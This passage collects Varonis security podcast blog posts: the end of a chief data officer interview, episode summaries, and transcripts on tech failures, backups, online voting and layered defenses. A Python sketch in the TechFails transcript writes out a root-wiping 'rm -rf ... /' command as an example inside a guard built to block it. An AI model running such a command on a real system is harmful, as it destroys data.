But a lot of folks in data science are increasingly coming from a liberal arts background. There's a whole new profession of data journalism. Data visualization is huge, and data science is drawing from that background too. I would put that more in the HR and communication skill bucket.
And I think if you're smart and you're really curious, as you said, there should be nothing stopping you from going out and acquiring all the skills that we're talking about.
Inside Out Security: What's a reasonable timeline you would give yourself as a CDO to validate and justify this new role?
Richard: It's a good question. I think that there are critical checkpoints along the way. I'll start at the beginning. I think that the first critical checkpoint is 90 days before you start.
And I'm not being facetious.
I actually believe that a good chief data officer is not going to take any CDO role that's not set up the right way.
And I've just found, with so many conversations I've had with companies that are looking to be successful in this area, they don't necessarily know how to structure the role for success. They don't know...should the data warehouse and ETL be under the CDO or not, or should that stay in IT?
And so I really think that it's incumbent on a CDO to make sure that that role is structured for success before they accept the job. Almost be a consultant to...and actually, a lot of CDOs who are in their roles were consultants or advisers to companies through this process.
I think that's number one. And then coming in on day one with the right success structure and the right metrics is really important.
And then, you know, I think that it's interesting. A lot of people argue back and forth about should we be driving quick hits or no, actually, we should be driving transformation.
And it feels like there's people in one of these two camps, and the answer, I think, is actually both. You have to do both. I believe in taking a portfolio approach. I think that it's really important to very quickly, early on, identify a couple large transformational projects that are going to move the needle for the company, but are going to take more like, a year or two to do.
But in addition to that, there's got to be a whole hopper full of monthly quick hits that come out, and they're just stoking the fire, feeding the engagement of the business. Because if you just do one or the other, then you're either going to lose engagement or you're going to lose the larger potential.
So I think, short answer to your question, the role needs to be set up for success. I think that within the first 90 days, a CDO needs to quickly assess the company and the situation, come up with an initial version of a road map, and use rigorous prioritization criteria to come up with a hopper of data-driven quick hits, as well as a few big transformational projects that get the executive team and the board of directors excited.
Richard: Sure. So the MIT International Society for Chief Data Officers, it came out of several conversations that a few of us in the community were having with a couple professors in the Sloan school.
Really, think of us as the IEEE for chief data officers. We're not affiliated with a vendor, and we keep more of a code of silence around our meetings. It's a place for chief data officers, chief analytics officers, really the leaders of data and analytics at $200 million plus companies, which is more or less the range that we're seeing,
To come together and roll up our sleeves and talk about what's worked, what hasn't worked, which vendors have delivered, which teams within which vendors have delivered, and what are common challenges.
It always amazes me.
From MIT, we went down to DC, and we were talking to chief data officers in the public sector. And I walked into those meetings thinking, "Oh, these people are going to have nothing in common with us in the private sector."
But they were talking about the challenges of data integration, the challenges of driving quick hits, and getting engagement. In the end, it amazed me how similar so many of our challenges are, and how many of the best ideas, what I call jiu-jitsu moves, ways of overcoming these challenges as an executive, really come from outside of one's own industry.
So I think it's obviously important to work with folks within one's industry to think about specifics like regulatory issues, for example.
But I think that it's equally critical to look outside of one's industry to find best practices in areas that other industries may be a little further along on some issues, and maybe they figured out something that we don't.
So MIT ISCDO right now, I think we're at around 150 executive members. We would invite anyone interested who thinks they qualify as an executive leader of data and analytics at a company with at least $100 million or so in revenue to apply. We do screen all the potential members, and assuming that somebody is qualified to be a member of our community, we would absolutely love to have them join us.
Inside Out Security: Thank you so much, Richard. I'm wondering, if people want to follow you, how can they contact you or follow you on Twitter?
Richard: Yeah, sure. So I would say, first, iscdo.org. My Twitter handle is @reWendell, and my email address, if anyone wants to get a hold of me, is richard@Wendell.io.
Inside Out Security: Thank you so much, Richard.
Richard: Thank you, Cindy. I enjoyed talking with you. I look forward to staying in touch.
Last week, Alpesh Shah of Presidio joined us to discuss law firms and technology. With big data, ediscovery, the cloud and more, it’s of growing importance that law firms leverage technology so that they can better serve their clients. And in doing so, law firms can spend more time doing “lawyerly things” and, um, more billing.
Want to learn more about Presidio? Visit them online. Or better yet, email Alpesh Shah at ashah@presidio.com.
Join us Thursdays at 1:30 ET for the live show on YouTube, or use one of the links below to add us to your favorite podcasting app.
The post Bring Your Geek To Court – IOSS 22 appeared first on Varonis Blog.
We were thrilled when pen testing veteran Ken Munro joined our show to discuss the vulnerabilities of things.
In this episode, Ken reveals the potential security risks in a multitude of IoT devices – cars, thermostats, kettles and more. We also covered GDPR, Privacy by Design, and asked if Ken thinks "The Year of Vulnerabilities" will be hitting headlines any time soon.
Munro runs Pen Testing Partners, a firm that focuses on penetration testing on the Internet of Things. He’s a regular on BBC, and most recently, he was interviewed by one of our bloggers, Andy Green.
Join us Thursdays at 1:30 ET for the live show on YouTube, or use one of the links below to add us to your favorite podcasting app.
The post The Vulnerability of Things – IOSS 21 appeared first on Varonis Blog.
Whether you’re a proponent of open-source or proprietary software, there’s no doubt that the promise of open-source is exciting for many.
For one thing, it’s mostly free. It’s built and maintained by passionate developers who can easily “look under the hood”. The best part is that you’re not married to the vendor.
Yes, there are many helpful open-source security tools as well as awesome projects based on Go. But lately, there has been a controversial case of open-source ransomware. Originally created to educate others about ransomware, it's been turned into mashup ransomware without a backdoor for recovering the decryption key.
In this episode, we discuss the benefits and shortcomings of open-source, a throwback to our passwords episode and more!
Join us Thursdays at 1:30 ET for the live show on YouTube, or use one of the links below to add us to your favorite podcasting app.
The post Go Open Source! – IOSS 20 appeared first on Varonis Blog.
After reading about an IT admin at a large bank who went rogue, we put on our empathy hats to understand why.
And in this episode, we came up with three reasons.
Could changing the way you dress and improving your communication style be the answer?
What do you think? Let us know!
Join us Thursdays at 1:30 ET for the live show on YouTube, or use one of the links below to add us to your favorite podcasting app.
The post Moods and Motives of a Smooth Criminal – IOSS 19 appeared first on Varonis Blog.
Hackers, executives, military folks, IT people who work in insurance, even cab drivers all had something to teach us about security and privacy at the latest Black Hat event in Vegas.
Join us Thursdays at 1:30 ET for the live show on YouTube, or use one of the links below to add us to your favorite podcasting app.
The post Excellent Adventures at Black Hat – IOSS 18 appeared first on Varonis Blog.
Going from policy to implementation is no easy feat; some have said that Privacy by Design is an elusive concept.
In this episode, we meditated on possible solutions such as incentivizing privacy and making it the default setting. We even talked about the extra expense of having a Privacy by Design mindset.
What do you think about going from policy to implementation? Share with us your thoughts!
Join us Thursdays at 1:30 ET for the live show on YouTube, or use one of the links below to add us to your favorite podcasting app.
The post More Articles on Privacy by Design than Implementation – IOSS 17 appeared first on Varonis Blog.
If there’s something strange on your network, who should we call?
The security team!
Well, I like to think of them as Threatbusters. Why? They’re insatiable learners and they work extremely hard to keep security threats at bay.
In this episode, we talk about awesome new technologies (like computer chips that self-destruct and ghost towns that act like honeypots), how to get others within your organization to take security threats seriously, and threatbusters who are doing applause-worthy work.
Join us Thursdays at 1:30 ET for the live show on YouTube, or use one of the links below to add us to your favorite podcasting app.
The post Threatbusters – IOSS 16 appeared first on Varonis Blog.
When technology doesn’t work when it should, is it a tech fail? Or perhaps because humans are creating the technology, fails should be more accurately called a human fail? In this episode, we discuss various types of “fails”, including the latest popular Pokémon Go, why we can’t vote online and the biggest fail of all, a data breach.
Cindy: This week, I’m calling our show #techfails.
But in preparing for this show and thinking deeply about our fails, I just want to echo what Kilian has been voicing these past couple of episodes: when our technology fails, like, for instance, if my Skype for Business isn't working, then my first thought is, "Oh, it's a tech fail. I can't believe it's not working." But we're the ones creating the technology.
So, for me, it feels like, at the end of the day, a human fail. Let's discuss this and debate it for a bit.
To set the context, there was an article in the Harvard Business Review, which eventually turned into a LinkedIn post too. It's titled "A New Way for Entrepreneurs to Think About IT." It said that IT is primarily known as either a necessary evil, IT support, or IT as a product. With many different types of technologies at our fingertips, we can really do a blend of both.
For instance, APIs have really changed how firms interact and share information with each other. And we really take this for granted these days, because back then you’d have to get permission from legal to sign contracts before experimenting with partnerships.
Now you can easily partner up with another service through an API or use OAuth. It's really increased our productivity, but it can also have some potential problems if we're not careful.
For instance, if you downloaded Pokémon Go earlier this week, you might have given it full access to your Google account. That meant that the Pokémon people could read all your emails and send out emails for you.
But since then they fixed it. I think, Kilian, they fixed it pretty quick.
Kilian: Yeah, in about, I think, 24 hours, more or less, they had a patch out that addressed it already. I think, as opposed to a technology fail, that might be a technology win, for a company really taking these concerns seriously and addressing it as soon as it's brought up.
Mike: Before we get into that, I just want to know, what’s your guys’ level? How you been doing on Pokémon Go? Have you been getting out there, doing your Pokémon?
Cindy: I’ve been…I actually downloaded it at the office. And I could have thrown something at somebody, but I didn’t. I’m like, “Well, I’m just doing this for work, so better not start running after people and throwing stuff at them.”
Mike: You couldn’t convince the rest of the office that playing Pokémon Go was part of your job?
Cindy: Actually, we had a mobile photography class earlier this week, and Michelle, our HR person, was walking around telling people that Pokémon’s gonna be there. She was doing that for me.
Mike: Nice. How about you, Kilian, have you tried it?
Kilian: No, I haven’t downloaded it. That would require going outside and interacting with things, maybe.
Mike: The first couple ones show up right around you. And I think this is kind of where I was going with this, which is that a lot of this…in terms of tech fails, this is really about managing complexity.
In terms of IT, trying to manage these external services, it’s about managing complexity on an organizational level instead of a personal one. Because when you think about what is involved for this stupid game of Pokémon Go, you’re talking about interacting with geosynchronous orbital satellites for GPS, the internet to get all these apps, these multiple different services. And to pull all that together requires this huge thing. The security issue came about because Google was asking for OAuth access, and that’s just when you use Google to log into it. You log in with your account and it has these things.
And it’s so complex because even though it doesn’t look like it, it actually uses Google Maps data underneath.
A trick you can do is, if you have Google Maps installed on your iPhone, you can enable offline map access. And in order to achieve app-to-app communication between sandboxed apps on the iPhone, it needs all these extra permissions, and it's just insane trying to make that work. It's so easy when you're building something to just say, give me all the permissions, and we'll slowly back it down to where it's supposed to be.
Cindy: Do you think this is kind of like, "Okay, we're going to use an external service, and then just not really look at the settings because we're so focused on making Pokémon Go a wonderful experience?"
Mike: Well, that's the consumer side. At the level we work at, people try to look at something like Amazon Web Services, which this article mentions. It is fantastically complex.
It’s something like 60 different individual services that do individual things and also overlap with other ones where like, oh, there’s like six different ways to send an email with AWS. There’s 20 different ways to put a message in a queue to be picked up by something else. Just trying to wrap your head around like, what actually is it doing, is just insane.
And it’s possible to do the stuff. I think it’s just a really hard equation of, “Do we bring this in-house and have a dedicated person for it? Is that more or less of a threat than having this outside?”
Something I see a lot of is…coming more from the app side of things is, people swearing up and down that, “I’m gonna get on a virtual private server somewhere for ten bucks a month, put my own version of Ubuntu on it and keep it up to date.”
And it’s really hard to imagine that that is as secure as having a dedicated security team at AWS or Heroku or one of the other Azure platforms as a service.
It’s that same scenario, sort of, at the organizational level, that either it’s a tremendous amount of effort to maintain and secure all those things yourself, or you’re essentially paying for that in your service contract.
Cindy: I think those are all really good questions to ask, and it requires a huge team.
Cindy: I kind of want to transition into another fail that’s different than asking good questions and figuring out the architecture.
The next fail is a fail on many different levels. It would be interesting for us to discuss.
Back in April, there was an article, published and shared over 65,000 times, about the owner of a small hosting company with a little over 1,500 users who said that he had deleted his customers' hosted data with a single command.
Then later we found out that he was just trying to market his company's new Linux service. People were outraged that he didn't do a better job backing up, and they were outraged that he lied to Server Fault, a community that really helps one another figure stuff out: security, backups, just technology. It's complicated.
I was a little skeptical reading the article with the headline that said “One Person Accidentally Deletes His Entire Company With One Line of Bad Code.”
As you’re responsible for hosting data, you should have multiple backups.
One of my favorite comments was, how do you even accidentally type a command that deletes everything?
What are your thoughts and reactions to this article?
Mike: Kilian, you want to go? I have my own thoughts.
Kilian: Sure.
First off, that’s a terrible job of advertising. I don’t know what he’s advertising for. Like, “Host with us and I might break your stuff.”
I think the point he was probably going for is that it’s easy to make mistakes, so get a dedicated person that knows better.
But I don’t think that really came across.
For the actual command itself, a lot of people are in such a hurry to automate and make things easier that it is easy to make mistakes, especially as Mike mentioned earlier, with these vastly complicated systems with dozens of ways to do the same thing.
The more complex the system gets, the easier it is to make a mistake. Maybe it could be that disastrous.
But a lot of things really have to go wrong, with kind of poor decisions made throughout the chain. But it's conceivable that someone could have done that.
Mike: Specifically, to the question that was asked on Server Fault, which is a question and answer site for these issues: there are a lot of utilities that can take either a single directory or multiple different directories as arguments.
So you say, "Hey, copy these two things," or "Copy this one thing." And in this case, the person put in a space, so they had something like /pathfolder /. That last slash got interpreted as the root of the volume they were on. And so, hey, we just destroyed everything, and everything includes all your keys and stuff.
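To make the failure mode concrete, here is a minimal Python sketch; the command string, paths, and the guard function are all hypothetical, just to show how whitespace splitting turns one intended path into two and how a simple sanity check could refuse to touch the root of a volume.

import shlex

# A hypothetical command with an accidental space before the trailing slash.
cmd = "rm -rf /var/www/old-site /"

# The shell splits arguments on whitespace, so the stray space yields TWO
# path arguments: the intended folder and the root of the volume.
args = shlex.split(cmd)
paths = args[2:]                      # ['/var/www/old-site', '/']

FORBIDDEN = {"/", "/home", "/etc", "/var"}

def check_targets(paths):
    # Refuse obviously catastrophic targets before anything is removed.
    for p in paths:
        if p in FORBIDDEN or p.rstrip("/") == "":
            raise ValueError("refusing to delete %r" % p)
    return paths

try:
    check_targets(paths)
except ValueError as err:
    print(err)                        # refusing to delete '/'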
Something we talk a lot about in here is layered security, but you need layered backups and recovery as well.
That was really the answer to this: they were on a virtual private server.
In addition to just backing up the local data, the database, the files on it, the provider can take system images of your entire VPS and keep them somewhere else.
I am incredibly paranoid with backups, especially backups of systems like this. So I always try to even get it out of that provider's system. In this case, it was Hetzner, which is a European hosting provider, so you get that backup out onto S3, or out onto Rackspace Cloud, or something else, just to try to make that a better scenario.
Kilian: That’s a great point, is having multiple different…you can’t have one single point of failure in a system like this.
Otherwise, you could be very vulnerable.
Even for myself when I, for example, backup pictures off of my camera, I have to go to my laptop, I have to go to a network share, and then I have a separate hard drive that I plug in just for that, and then unplug and put it away afterwards. So I have three different places for it. Not that they’re that valuable like a hosting system, but silly things happen sometimes. You know, if I lose power or power surge, I lose two of my systems for some reason, I still have that hard drive that’s sitting in a drawer.
Mike: I have a lot of discussions with people where they have backups and this very elaborate system. They're like, "All right, I have my local network-attached storage here, then I've got this other server, and then I rotate them and do all this stuff." That's awesome until their house catches on fire and they lose everything. And that's the stuff you have to think about. These things come at you in weird ways, especially when everything is so interconnected and so dependent on everything else that you can have these weird cascading levels of failure, from very crazy sources. Like, a DNS server gets hit with a DDoS attack, and that actually ends up taking down a third of the internet just because everything is so connected.
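Here is a minimal sketch of that layered, off-provider backup idea in Python; the archive path, the external-drive path, and the bucket name are hypothetical, and it assumes the boto3 AWS SDK is installed and credentials are already configured.

import shutil
import boto3  # assumes the AWS SDK for Python is installed and configured

# Hypothetical archive produced by a nightly dump job.
ARCHIVE = "/backups/site-2016-07-15.tar.gz"

# Copy 1: a second physical device on site.
shutil.copy2(ARCHIVE, "/mnt/external-drive/site-2016-07-15.tar.gz")

# Copy 2: a completely different provider, so losing the hosting account
# (or the house) doesn't take every copy with it.
s3 = boto3.client("s3")
s3.upload_file(ARCHIVE, "example-offsite-backups", "site-2016-07-15.tar.gz")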
Cindy: Our next fail…I want to know if you guys think that our inability to vote online is a human fail or a tech fail. What do you guys think? Or any opinion, really.
Mike: It’s all in the execution, like all this stuff. That if there was a verifiable, cryptographically secure way of knowing that you could vote, that would be a very positive thing, potentially. It’s a really interesting mix of software and technological concerns, and people, and sociological and political concerns.
What I just said about having almost a voting receipt that says, “Great, you used your key to sign, and you have definitely voted for this person and done this thing.”
One of the reasons that's never been done, even with most paper systems, is that it was a huge source of fraud. In the olden days, when they had voting receipts, you would go and turn them in to your councilman, and they would say, "Great, here's your five bucks for voting for me in this election."
So that’s just something that’s not done. That’s not a technical issue. It’s certainly possible to do those things, but it leads to all these other unforeseen, I don’t know if you’ve heard of the cobra effect kind of things, these horrible unintended consequences.
Cindy: I think this article on why we still can’t vote online was just very thoughtfully written. It talked about how it can potentially destabilize a country’s government and leadership if they don’t get voting online right. It was really just like, wow, I can’t believe a researcher at The Lawrence Livermore National Lab said, “We do not know how to build an internet voting system that has all the security, and privacy, and transparency and verifiable properties that a national security application like voting has to have.” And they’re worried about malware, they’re worried about ransomware, they’re worried about being able to go in and track, do a complete security audit.
They said something interesting too about how, in the finance system, sure, you have sensitive data, and you can go back and track where the money went, more or less, if you have these systems in place. But you might not necessarily be able to do that with voting: someone can say, "I voted for so and so," and then it gets changed to somebody else, and they can't go back and verify that. There are so many elements that you need to consider. It's not just Pokémon; you're not just trying to create a wonderful gaming experience, or trying to back things up. There are a multitude of things you need to take into consideration.
Kilian: The one big thing, and I think the heart of it, was the need for anonymity in the voting process.
That’s kind of the way it was set up to avoid coercion and some other problems with it, is you need to be anonymous when you cast that vote. By putting it online, the real down side is… Like, if you think about online banking, it’s important to know and verify that you are who you say you are, and have a transaction of that entire process so you can ensure…it’s kind of both parties know that the money transfer from X to Y or so on and so forth. And you have the track of the steps.
But when you try and introduce anonymity into that equation, it completely falls apart. Because if you have that tracking data going back to somebody casting a vote, then they could be a target of coercion or something like that. Or if the opposition party finds out, they could go after them for not voting for whoever.
Cindy: Yeah, they did that with Nelson Mandela.
Kilian: Yep.
And then the other thing too is, as a person casting a vote, if you think about it, you're kind of trusting the system. It's a complete black box to you at that point. So when you click the button and say, "I vote for candidate XYZ," you have no idea, because, again, you want to be anonymous. You don't have verification from the system that says, "Hey, my vote wasn't changed to candidate ABC in the process." You kind of have to go along with it.
Even if you look back at some of the physical problems with the George W. Bush election with the ballots not lining up right with the little punches. It was punching for… I forget what the other candidate’s name was.
Cindy: Al Gore?
Kilian: No, no, no. It was Pat Buchanan or somebody, whoever the third-party candidate was. But they were saying, "No, no, I voted for Al Gore," or whoever, but it registered for somebody else. They had to go back and manually look at the physical paper to validate that. But if you think about a digital system, if you click the button, you have no way to audit that, really. Because if the system says, "No, you voted for this guy," you have no proof, you have no additional evidence to back that up, and that's the big problem.
Cindy: They actually showed this in "The Good Wife," the TV show that is no longer around, or just ended. The voters would go in and vote for someone, but then it would also give the other person five additional votes. Another thing they didn't mention, but I think politicians, or just that kind of industry, are a tad bit slower on the technology side.
Because Barack Obama's campaign really set the tone for using technology and social media to engage voters. He really changed how politicians now market and connect with people. I don't know, do you feel like they're kind of behind? Or maybe that's just me?
Kilian: My personal opinion is, we have laws that don't make sense for where technology's at, because lawmaking is slow. We're still running on, and prosecuting cases under, laws that were made in the '80s and early '90s, and even older in some cases, when technology was vastly different than what we have today. This might be off topic, but there was just, I think, a ruling that the Computer Fraud and Abuse Act could theoretically mean that if you share your Netflix password, it's a federal crime. Now, that's open to interpretation, but that was a story I had seen the other day. We have all this technology and it's evolving much, much faster than the people making the regulations can keep up with.
Mike: I just want to see a Poke stop at every voting registration.
Cindy: Mike has Pokémon on his mind.
Kilian: It’s great, it’s good fun.
Cindy: Now I have Pokémon…I actually visualized us playing Pokémon at a voting station. That would be interesting. It’s too hot and humid in New York to do that.
Kilian: Vote to vote or play Pokémon.
Cindy: I almost want to say Poke because it’s so hot.
Kilian: Well, to the candidates out there, the first one to get on top of this making a Poke stop at the voting booths in November might seize the election with the youth vote.
Mike: A Pokémon at every pot.
Cindy: Let’s also kind of think about potential fails, though. We’ve seen Target, Sony, the data breaches. And so, when fails happen that costs them their jobs, do you think one person should be blamed for all of it or can we also kind of say, “We don’t have the technology right yet”?
Mike: It’s interesting. What we’re talking about is, there have been a lot of very large data breaches. And what seems to happen is, it happens and then depending upon how much press it gets, the CEO has to resign or doesn’t. Or in the case of the OPM, the director. The parallel that I like to think of is Sarbanes Oxley, which has had a lot of other consequences. But the big one was that the chief executive has to sign off on the financials of the company. Before, it was always there were a lot of scandals where it was like, “I’m just running the company. My CFO and the accounting group, they were doing their own thing with the funds. And I wasn’t aware that this…”
Then we said this like 10,000 pounds of coconuts we had on the dock, they were rotten were actually good. We counted those in the asset, all of those kind of shenanigans. And just that thought that, okay, the finances and the statements that are put out, that is an executive level sign off, that there’s a responsibility at that level to ensure that those are correct. What we’re seeing is sort of that happening on the IT security side. That maintaining integrity of your customer’s data, of the people you’re responsible for, that is something that the executives need to say is a priority, and to ensure that in any way they can. That if they aren’t doing that, that’s their job, that they failed at their job.
Now, looking through these kind of stories, you typically find that the person in charge is not a network security person, because there’s not a lot of people that get their CISSP and then say, “I’m qualified to be CEO.” That’s just not how the normal job progression works. But they need to have people in place, and they need to make sure that the right things are happening, despite not having the personal expertise to implement those but that they make it a priority and they give budget, and they’re able to balance it against the other needs of the company.
Cindy: In order to come back from a security or technology fail...there was an article titled "There's new technology that can predict your next security fail." They are essentially talking about predictive analytics. I really liked a quote from it: "It's only as good as the forethought you put into it, and the questions that you ask of it."
If you don’t think about it, if you don’t have a whole team to work on this huge security and technology problem…because there’s only so much you can…in terms of big data, machine learning, predictive analytics, there’s a lot of stuff, a lot of elements that you’re unable to kind of account for.
So if you don’t consider all the different elements in security, you can’t build that into the technology that we build. What are some other things you think that can help companies prevent or come back from a tech fail or a security fail or a human fail?
Kilian: The only thing that came to mind there was asking the right questions. For me, it's from The Hitchhiker's Guide to the Galaxy. If you ask it what's the meaning of life, the universe, and everything, it's going to give an answer. But what's the question you're really trying to get answered? That's all I can think of in my head. I think that's one thing people get stuck on a lot of the time: asking the wrong questions of their data. I'm sorry, Mike, I cut you off there. You were going to say something.
Mike: I’m in agreement with you, Kilian, because I think too often the question posed is, “Are we secure?” There’s no crisp answer to that. It’s never gonna be yes, we’re 100% good, because the only way to do that is not to have any data, and not to have any interactions with customers. If that’s the case, then you don’t have a business. So you have to have something. You still have to have people interacting, and the moment you have two people interacting, you’re vulnerable at some level. They can be tricked, they could do anything. And then you have networks, and the networks are talking.
So it’s much more about, what is the level of risk that you find acceptable? What steps can you take towards mitigating known dangers? How much effort and time and money can you put behind those efforts? There’s no quick fix. Something we talk about a lot on this is that data is, in a lot of ways, like a toxic asset. It’s something that you need to think about like, “Oh, we have all this extra data. Well, let’s try and get rid of some of it. Just so we don’t have it around to cause us a problem, just so we don’t have it around to be leaked in some way.” There’s lots of different ways to do that and lots of benefits of doing so.
Cindy: Now we're in the parting gift segment of our show, where we share things we're working on, or something we found online that we think our viewers and listeners would appreciate. I just read that Chrysler, the car brand, is offering a bug bounty of between $150 and $1,500 for finding bugs. But you can't make it public. And also, I just updated top InfoSec people to follow. I included a whole bunch of women that were missed. So check that out at blog.varonis.com.
Mike: Who’s the one person you think we should follow that we weren’t before?
Cindy: I definitely think we should all be following Runa Sandvik. She's the new information security person at The New York Times, and she writes about InfoSec there. She also worked on Tor, and she did this really cool rifle hack and wrote about it. Or someone wrote about her hack in Wired. Any parting gifts, Mike?
Mike: I was gonna recommend Qualys' SSL Labs server test. If you're unaware of what it is, you can put your website into it and it will run through all the different ways in which you've screwed up setting it up properly to be secure. It gives you a nice letter grade. So, a couple of interesting things about this. One: it's really hard to make one of these yourself, because to do so, you have to maintain a system that has all of the old, bad libraries on it for connecting over the deprecated SSL versions, just so you can make the connections and say, "Yes, this remote system also accepts this." So it's not something you want to do, and it's not something you can do trivially. So it's great that this is an online service.
And then two: I think it's really interesting how they essentially just made up these letter grades for what they consider an A, an A+, a B. But in doing so, they were able to really improve the security of everyone. Because it's one thing to say, "Okay, out of 200 possible things, we comply with 197 of them." It's a different thing to know, "Okay, we got a failing grade because one of those three things we didn't do was actually really, really bad and exploitable." And being able to compare that across sites, I think, gives a lot of incentive for everyone to improve their site. Like, "Oh, gosh, this other site has a better grade than us. We should definitely improve things." So for those reasons, I think it's a really great part of the security ecosystem and a great tool for all of that.
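If you want to script that kind of check instead of using the web page, SSL Labs also exposes a public assessment API. Here's a minimal Python sketch; the endpoint, parameters, and field names are written from memory, so treat them as assumptions and confirm against the current SSL Labs API documentation.

import time
import requests

API = "https://api.ssllabs.com/api/v3/analyze"   # assumed v3 analyze endpoint
host = "www.example.com"                          # hypothetical target

# Start (or resume) an assessment and poll until it finishes.
while True:
    report = requests.get(API, params={"host": host, "all": "done"}, timeout=30).json()
    if report.get("status") in ("READY", "ERROR"):
        break
    time.sleep(15)  # assessments can take a few minutes

# Print the letter grade for each endpoint (IP address) that was tested.
for endpoint in report.get("endpoints", []):
    print(endpoint.get("ipAddress"), endpoint.get("grade"))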
Cindy: Kilian, do you have a parting gift?
Kilian: I was reading an article the other day. It was pretty interesting how we've all come to rely on our phones and our digital assistants, like Siri or Google Now, to make it easier to interact with a device. Some researchers started thinking, "Hey, this is a good avenue for exploitation." They started distorting voice commands so they could embed them in other things, to get your phone to do stuff on your behalf. So it's just an interesting thing to be aware of, how you're using your digital assistants, because other people could start to exploit them by issuing voice commands, maybe to direct you to a malicious site or something. It's one more thing to keep in the back of your mind.
Join us Thursdays at 1:30 ET for the live show on YouTube, or use one of the links below to add us to your favorite podcasting app.
The post TechFails – IOSS 15 appeared first on Varonis Blog.
Layered security refers to the practice of combining various security defenses to protect the entire system against threats. The idea is that if one layer fails, there are other functioning security components that are still in place to thwart threats.
In this episode of the Inside Out Security Show, we discuss the various security layers.
Cindy: Hi and welcome to another edition of The Inside Out Security Show. I’m Cindy Ng, a writer for Varonis’ Inside Out Security Blog, and as always, I’m joined by security experts, Mike Buckbee and Kilian Englert. Hi, Kilian.
Kilian: Hi, Cindy.
Cindy: Hey, Mike.
Mike: Hey, Cindy. You call us security experts. I’m actually, where I don’t know if you can see it, “I have a fake internet job”…because I still haven’t been able to explain my job to my mom and dad. “He does something.”
Cindy: We’ll see who’s most fake at the end, okay?
So recently, Rob wrote a layered security guide and I thought it would be interesting for us to go through each of the layers and share stories that we’ve read or heard as it relates to each of the layers.
The idea with layered security is that you want to make sure that you have many different layers of defense that will protect you. If there are any holes, just in case something gets in, you might have a security layer that serves as a backup that will catch it.
So the first layer to start with is the human layer. That layer is all about educating people to spot scams and be cautious about the passwords, social security numbers, and credit card information that they give out.
This layer, Kilian, you talk about this a lot. I feel like, increasingly, criminals are exploiting services that we rely on and turning them into an attack vector. There was an article recently about people texting you, pretending to be Google and saying, "Hey, there was this suspicious attempt to get in." And we've talked about passwords and alternatives and using two-factor, and it's kind of like, "Oh man, I have to check my text messages and make sure I'm not scammed again," like another thing to worry about.
Kilian: Oh, yeah. People, by nature, want to be trusting of other people. We kind of have been trained since day one to feel kind of bad about being suspicious … The bad guys out there know this and they exploit it. It’s so much easier to go after a person and just kind of play off of emotions because they’re far more malleable than a system, and people often are not trained or educated around security practices. And even if they are, they’re kind of trained into a certain mindset.
So if they see something that looks semi-legitimate, like, "Hey, a text from Google. Oh, they're protecting me. They have my login name or my IP address or NIC address or something," most people are not going to investigate that closely; it's going to look fairly legitimate, like, "Oh, hey, Google's looking out for me. This is great." It's very easy, with just a little bit of legitimacy, to get people to go along with it. A con of that sort is as old as time, basically, and it's only getting easier.
Mike: I’ll go with something that you said Kilian, which is that it’s really about our mindset. And I think from a security practitioners’ standpoint, we’re typically very focused on exploited time and this and do this things and so we forget a lot about on the human layer which is education and like how to educate your users and to help make them part of your line of defense.
I think a fun activity for that is actually to do phishing, and there is a couple of companies that do this, that do like fake phishing attacks, and then basically, so I go, “You clicked on this so we are reporting you to IT.” And it’s kind of almost like in hospitals where they like shame the doctors into making sure they wash their hands all the time. You’re kind of like trying to enforce this IT hygiene aspects on all of your users, and either hire a company or you have some free time, you can just try to phish your users individually to mess with them.
Kilian: Sure.
Cindy: Our next layer is the physical layer, and you know, I would be like the worst security person to hire because I wanted to skip talking about this layer. There are so many layers and Mike's like, "Why aren't we talking about it? It's the most important one." And Kilian is like, "It's often overlooked." And I said, "It's just the physical layer, like everybody gets that." Tell us a little bit more about the physical layer.
Kilian: I guess I'll jump in. It is so often overlooked. We worry about firewalling the data off to protect from external attacks and stuff that comes in over the wire. But how many times in businesses do people check badges? You can walk into a corporation, and if the guy sitting at the desk is distracted for a minute, then you're inside and nobody looks twice at you. If the doors aren't locked in the server room, you walk in and plug in a USB device.
Basically, once you have physical access to something, it's game over. There's probably no other layer of security that they can't get around at that point. And we rely so much on just observing people, and we put a lot of faith in locks, too, like physical key locks. They're such a terrible false layer of security. Most front door locks or bike locks or anything else are easily defeated within seconds. The physical layer is often overlooked, and it's such a false layer of security, too, because we assume somebody is watching the door. And again, we are relying on people, and people want to be trusting.
Mike: What I was going to mention with respect to the physical layer is that I think a lot of things are changing. Businesses are much more distributed: lots of different physical branches and places, people working from all sorts of remote situations. And it used to be that everything was hard wired; now, most every place has Wi-Fi. So you have this very different situation of everyone in the office walking in with a Wi-Fi radio that's connected to the internet. But we don't think about that. We're just like, oh, we are on our cellphones, but there could be malware on there that could potentially perform an attack or some form of disruption.
There are some really interesting exploit tools that do things like DHCP exhaustion on a network, and so you have to do things like MAC filtering. I worked in a high-security environment in the military. They have things like, if you unplug a computer from the wall, from the Cat5, and plug it back in, it won't let it back on the network because it lost the MAC association. You can't just bring a laptop in and plug it into the Ethernet port in the waiting room. Things like that are very sensible suggestions.
Cindy: I just had a paranoid thought that when I go home, I want to install 10 locks, put on a password, and somehow authenticate myself further to get in. So in terms of business security, can you go overboard putting a trillion locks on something? And what's a good balance for an extremely paranoid person like me?
Kilian: I’ll get dogs with bees in their mouth so when they bark, they shoot bees at you.
Mike: From a business standpoint, I think the biggest thing is actually procedures: procedures around access to servers, access to changes, that kind of thing. And then from there, the procedures you implement help with recognizing what's a threat and what isn't.
On a personal level, something that I've been seeing a lot more of in terms of physical stuff is skimmers on ATMs. That's probably, like we were talking about, a personal sort of physical attack. That's probably the big one: at every ATM you go to, you sort of want to tug at the card reader to see if it falls off, because it's so easy to put a skimmer on.
Kilian: That kind of distilled… it’s situational awareness, kind of being observant of the people and things around you, what you’re interacting with.
Cindy: Another thing we need to be alert and aware of are endpoints – protecting devices, PCs, laptops, mobile devices, from malicious software. People really like using endpoint protection to guard against ransomware, and people have found out it's not always effective. And if it's not ransomware, malware can sit on your system for like six months before it's even identified. But people still really want to protect their endpoints. What are your responses and thoughts on this?
Mike: I’ll go. I guess my first thought is we’re talking about layered security, and so no solution is going to be a homerun 100% of the time. And so what we are really trying to work on is percentages, reducing the surface area we can be attacked on, reducing the opportunities for an exploit.
Endpoint security can certainly be part of that, but it's not a complete solution. By limiting the types of apps that can be run and the types of traffic that can come in, it's a way of helping to manage that risk.
And that's what we're talking about with all the layers: how can we manage risk at all these different layers? And hopefully, by doing that simultaneously at all the layers, we improve our security much more than if we thought, "Okay, it's just endpoint security," or "It's just training the users."
